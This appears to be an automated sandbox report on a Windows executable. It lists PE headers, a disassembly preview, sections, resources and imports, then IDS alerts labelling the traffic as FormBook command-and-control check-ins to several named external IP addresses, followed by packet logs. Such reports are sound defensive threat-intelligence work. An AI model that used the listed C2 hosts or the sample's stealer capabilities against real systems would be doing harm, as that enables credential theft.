Time Stamp:	0x66D138FC [Fri Aug 30 03:14:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F803901F363h
jmp 00007F803901EC6Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F803901EE4Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F803901EE1Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8039021A0Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8039021A58h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8039021A41h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x4c7e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x121000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x4c7e4	0x4c800	2047738e68422246e7b7fde7b0713854	False	0.9145890778186274	data	7.862497970768681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x121000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x43a7c	data			1.0003283823380822
RT_GROUP_ICON	0x120234	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1202ac	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1202c0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1202d4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1202e8	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x1203f4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T10:26:56.932991+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64520	80	192.168.2.5	213.186.33.5
2024-08-30T10:26:56.932991+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64520	80	192.168.2.5	213.186.33.5
2024-08-30T10:26:56.932991+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64520	80	192.168.2.5	213.186.33.5
2024-08-30T10:29:41.195600+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64525	80	192.168.2.5	23.227.38.74
2024-08-30T10:29:41.195600+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64525	80	192.168.2.5	23.227.38.74
2024-08-30T10:29:41.195600+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64525	80	192.168.2.5	23.227.38.74
2024-08-30T10:27:57.840329+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64521	80	192.168.2.5	93.179.125.252
2024-08-30T10:27:57.840329+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64521	80	192.168.2.5	93.179.125.252
2024-08-30T10:27:57.840329+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64521	80	192.168.2.5	93.179.125.252
2024-08-30T10:25:55.441358+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64524	80	192.168.2.5	76.223.105.230
2024-08-30T10:25:55.441358+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64524	80	192.168.2.5	76.223.105.230
2024-08-30T10:25:55.441358+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64524	80	192.168.2.5	76.223.105.230
2024-08-30T10:25:55.441358+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64526	80	192.168.2.5	198.185.159.144
2024-08-30T10:25:55.441358+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64526	80	192.168.2.5	198.185.159.144
2024-08-30T10:25:55.441358+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64526	80	192.168.2.5	198.185.159.144
2024-08-30T10:28:38.766341+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64523	80	192.168.2.5	162.254.39.135
2024-08-30T10:28:38.766341+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64523	80	192.168.2.5	162.254.39.135
2024-08-30T10:28:38.766341+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64523	80	192.168.2.5	162.254.39.135
2024-08-30T10:28:18.670505+0200	TCP	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	64522	80	192.168.2.5	199.116.255.220
2024-08-30T10:28:18.670505+0200	TCP	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	64522	80	192.168.2.5	199.116.255.220
2024-08-30T10:28:18.670505+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	64522	80	192.168.2.5	199.116.255.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 10:26:56.433182001 CEST	64520	80	192.168.2.5	213.186.33.5
Aug 30, 2024 10:26:56.438621998 CEST	80	64520	213.186.33.5	192.168.2.5
Aug 30, 2024 10:26:56.438704014 CEST	64520	80	192.168.2.5	213.186.33.5
Aug 30, 2024 10:26:56.438729048 CEST	64520	80	192.168.2.5	213.186.33.5
Aug 30, 2024 10:26:56.443727970 CEST	80	64520	213.186.33.5	192.168.2.5
Aug 30, 2024 10:26:56.926135063 CEST	64520	80	192.168.2.5	213.186.33.5
Aug 30, 2024 10:26:56.932895899 CEST	80	64520	213.186.33.5	192.168.2.5
Aug 30, 2024 10:26:56.932991028 CEST	64520	80	192.168.2.5	213.186.33.5
Aug 30, 2024 10:27:57.227142096 CEST	64521	80	192.168.2.5	93.179.125.252
Aug 30, 2024 10:27:57.232177973 CEST	80	64521	93.179.125.252	192.168.2.5
Aug 30, 2024 10:27:57.232260942 CEST	64521	80	192.168.2.5	93.179.125.252
Aug 30, 2024 10:27:57.232291937 CEST	64521	80	192.168.2.5	93.179.125.252
Aug 30, 2024 10:27:57.237171888 CEST	80	64521	93.179.125.252	192.168.2.5
Aug 30, 2024 10:27:57.724523067 CEST	64521	80	192.168.2.5	93.179.125.252
Aug 30, 2024 10:27:57.772367001 CEST	80	64521	93.179.125.252	192.168.2.5
Aug 30, 2024 10:27:57.833345890 CEST	80	64521	93.179.125.252	192.168.2.5
Aug 30, 2024 10:27:57.840328932 CEST	64521	80	192.168.2.5	93.179.125.252
Aug 30, 2024 10:28:18.165209055 CEST	64522	80	192.168.2.5	199.116.255.220
Aug 30, 2024 10:28:18.170079947 CEST	80	64522	199.116.255.220	192.168.2.5
Aug 30, 2024 10:28:18.174391031 CEST	64522	80	192.168.2.5	199.116.255.220
Aug 30, 2024 10:28:18.174391031 CEST	64522	80	192.168.2.5	199.116.255.220
Aug 30, 2024 10:28:18.179682970 CEST	80	64522	199.116.255.220	192.168.2.5
Aug 30, 2024 10:28:18.661214113 CEST	64522	80	192.168.2.5	199.116.255.220
Aug 30, 2024 10:28:18.667026997 CEST	80	64522	199.116.255.220	192.168.2.5
Aug 30, 2024 10:28:18.670505047 CEST	64522	80	192.168.2.5	199.116.255.220
Aug 30, 2024 10:28:38.254806995 CEST	64523	80	192.168.2.5	162.254.39.135
Aug 30, 2024 10:28:38.259728909 CEST	80	64523	162.254.39.135	192.168.2.5
Aug 30, 2024 10:28:38.262367010 CEST	64523	80	192.168.2.5	162.254.39.135
Aug 30, 2024 10:28:38.262367010 CEST	64523	80	192.168.2.5	162.254.39.135
Aug 30, 2024 10:28:38.267342091 CEST	80	64523	162.254.39.135	192.168.2.5
Aug 30, 2024 10:28:38.761038065 CEST	64523	80	192.168.2.5	162.254.39.135
Aug 30, 2024 10:28:38.766282082 CEST	80	64523	162.254.39.135	192.168.2.5
Aug 30, 2024 10:28:38.766340971 CEST	64523	80	192.168.2.5	162.254.39.135
Aug 30, 2024 10:28:58.982465029 CEST	64524	80	192.168.2.5	76.223.105.230
Aug 30, 2024 10:28:58.987394094 CEST	80	64524	76.223.105.230	192.168.2.5
Aug 30, 2024 10:28:58.987464905 CEST	64524	80	192.168.2.5	76.223.105.230
Aug 30, 2024 10:28:58.987550974 CEST	64524	80	192.168.2.5	76.223.105.230
Aug 30, 2024 10:28:58.992343903 CEST	80	64524	76.223.105.230	192.168.2.5
Aug 30, 2024 10:28:59.452754974 CEST	80	64524	76.223.105.230	192.168.2.5
Aug 30, 2024 10:28:59.452779055 CEST	80	64524	76.223.105.230	192.168.2.5
Aug 30, 2024 10:28:59.452867985 CEST	64524	80	192.168.2.5	76.223.105.230
Aug 30, 2024 10:28:59.452910900 CEST	64524	80	192.168.2.5	76.223.105.230
Aug 30, 2024 10:28:59.457777023 CEST	80	64524	76.223.105.230	192.168.2.5
Aug 30, 2024 10:29:40.732502937 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:40.737576962 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:40.738456011 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:40.738456011 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:40.743351936 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195427895 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195444107 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195455074 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195463896 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195476055 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195502996 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:41.195563078 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:41.195600033 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:29:41.195708990 CEST	80	64525	23.227.38.74	192.168.2.5
Aug 30, 2024 10:29:41.195743084 CEST	64525	80	192.168.2.5	23.227.38.74
Aug 30, 2024 10:30:01.329178095 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.334105015 CEST	80	64526	198.185.159.144	192.168.2.5
Aug 30, 2024 10:30:01.334162951 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.334237099 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.338980913 CEST	80	64526	198.185.159.144	192.168.2.5
Aug 30, 2024 10:30:01.781708002 CEST	80	64526	198.185.159.144	192.168.2.5
Aug 30, 2024 10:30:01.781725883 CEST	80	64526	198.185.159.144	192.168.2.5
Aug 30, 2024 10:30:01.781805992 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.781811953 CEST	80	64526	198.185.159.144	192.168.2.5
Aug 30, 2024 10:30:01.781864882 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.781899929 CEST	64526	80	192.168.2.5	198.185.159.144
Aug 30, 2024 10:30:01.786714077 CEST	80	64526	198.185.159.144	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 10:26:36.942787886 CEST	56539	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:26:37.021075964 CEST	53	56539	1.1.1.1	192.168.2.5
Aug 30, 2024 10:26:44.760673046 CEST	53	50189	162.159.36.2	192.168.2.5
Aug 30, 2024 10:26:45.273961067 CEST	53	49708	1.1.1.1	192.168.2.5
Aug 30, 2024 10:26:56.395194054 CEST	51473	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:26:56.432456017 CEST	53	51473	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:16.098237991 CEST	60469	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:17.097822905 CEST	60469	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:18.114273071 CEST	60469	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:20.113356113 CEST	60469	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:22.110492945 CEST	53	60469	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:22.110512018 CEST	53	60469	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:22.110521078 CEST	53	60469	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:22.110529900 CEST	53	60469	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:36.276895046 CEST	55674	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:36.305670977 CEST	53	55674	1.1.1.1	192.168.2.5
Aug 30, 2024 10:27:57.207920074 CEST	59736	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:27:57.226470947 CEST	53	59736	1.1.1.1	192.168.2.5
Aug 30, 2024 10:28:17.748225927 CEST	64364	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:28:18.144921064 CEST	53	64364	1.1.1.1	192.168.2.5
Aug 30, 2024 10:28:38.238109112 CEST	51877	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:28:38.254153013 CEST	53	51877	1.1.1.1	192.168.2.5
Aug 30, 2024 10:28:58.925826073 CEST	59175	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:28:58.943214893 CEST	53	59175	1.1.1.1	192.168.2.5
Aug 30, 2024 10:29:20.108879089 CEST	64746	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:29:20.475792885 CEST	53	64746	1.1.1.1	192.168.2.5
Aug 30, 2024 10:29:40.714348078 CEST	59057	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:29:40.726933956 CEST	53	59057	1.1.1.1	192.168.2.5
Aug 30, 2024 10:30:01.226939917 CEST	58425	53	192.168.2.5	1.1.1.1
Aug 30, 2024 10:30:01.273308992 CEST	53	58425	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
